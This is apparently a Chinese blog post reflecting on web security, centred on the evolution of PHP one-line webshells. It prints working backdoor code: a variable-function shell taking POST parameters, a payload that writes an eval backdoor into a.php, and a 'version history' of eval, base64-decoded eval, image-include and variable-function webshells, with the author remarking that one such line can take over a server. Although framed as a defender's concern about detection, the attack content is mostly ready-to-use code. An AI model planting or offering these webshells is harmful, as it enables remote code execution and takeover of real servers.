安全，任重道远

历史证明:狭义web安全的一个分支，已经从走出的asp时代，正式进入php时代，随着运行平台由win系列走向多元化，服务器安全也开始从windows 普及到Unix/Linux，安全，任重道远，任何一个复杂的系统都禁不住仔细推敲，何况一帮人整天没事干就在那里盯着看，所以一小撮设计者的智慧始终不及 群众的力量。百密必有一疏。目前能做的是：做好基层群众，和大家打成一片。共享集体智慧，为安全出一份力。

安全没有一个最终解决方案，是一个辩证的问题，一个博弈，你出招我防守，然后苦练内功，穿好软猬甲。

心很急。要加快防守部署，一定要比他们快一步！

何来的感慨？看文！

行内看门道，行外看热闹,对那些满脑子的鬼点子的hacker佩服的五体投地

上代码：

<?PHP @$_POST[f]($_POST[w]);exit;?>
w=fwrite(fopen("a.php", 'a+'), "<?php eval($_POST[cmd]?;>");

f=*****

-------------------------------------------------------------------------------------------

实践证明:这个可行，唉，挂马检测任重道远阿，要另辟蹊径了

现状说明:必须熟悉新的语言，了解其安全特性，不要被淘汰

未来:......只求不要被淘汰

历史回顾：

ver 1.0 <?PHP eval($_POST[w]);?>

ver 1.1 <?PHP @eval($_POST[w]);?>

ver 1.2 <?PHP eval(@base64_decode($_POST[w]));?>

ver 2.0 <?PHP include 'xxoo.jpg' ;?>

ver 2.0.1 <?PHP require_once 'xxoo.jpg' ;?>

ver 2.0.* <?PHP ****** 'xxoo.jpg' ;?>

ver 3.0 <?PHP @$_POST[f]($_POST[w]);?>

ver 3.0.* <?PHP $a=@$_POST[f];$b=$_POST[w];........?>

ver *.* <?PHP /*UNKNOWN*/?>

像太极一样，八卦可以生万象，思路在这里，有了提示就能很快扩展的.

要问以后会如何，用某位老师的话：天知道！

仅此一句话就可以拿下一个服务器，这也许就是hack的魅力所在